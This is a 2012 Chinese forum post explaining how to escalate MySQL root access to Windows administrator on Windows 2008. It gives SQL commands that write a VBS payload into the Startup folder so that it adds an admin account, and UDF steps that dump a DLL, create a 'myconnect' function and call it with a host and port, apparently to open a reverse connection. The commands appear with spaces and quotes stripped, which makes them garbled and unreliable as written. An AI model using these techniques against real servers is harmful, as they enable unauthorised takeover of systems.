windows2008mysql提权

[复制链接]
查看275 | 回复0 | 2012-4-1 19:19:48 | 显示全部楼层 |阅读模式
mysql5.1版本以上,必须把udf文件放到mysql安装目录下的lib/plugin下才能创建自定义函数,mysqlintodumpfile并不能创建文件夹,所以mysql5.1以上的版本,root权限提权就很困难了,目前已有的方法只有写启动项如下:


 
windows2008启动项:
C:\\ProgramData\\Microsoft\\Windows\\StartMenu\\Programs\\Startup\\iis.vbs
select*fromaintooutfile"C:\\ProgramData\\Microsoft\\Windows\\StartMenu\\Programs\\Startup\\iis.vbs";
 
 
写启动项缺陷:

1、需要服务器重启(如果管理员3389远程桌面登陆时注销了用户,再次3389连接时,这个脚本就会运行,添加一个管理员,不需要重启)。

2、安全软件可能会拦截。
 
补充:

如果mysql小于5.1是root权限,windows2008一样可以拿到系统权限(mysql无降权处理)

1、mysql导出一个dll
SELECTudfFROM007hack_tabINTODUMPFILE'c:/007hack.dll
//udf内容网上早有公开
2、创建一个函数
createfunctionmyconnectreturnsintegersoname'c:\\007hack.dll
//c盘要可以写,注意是”\\”
3、调用这个函数
selectmyconnect('".$chost."','".$cport."')
//这只是一个例子
 
*
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则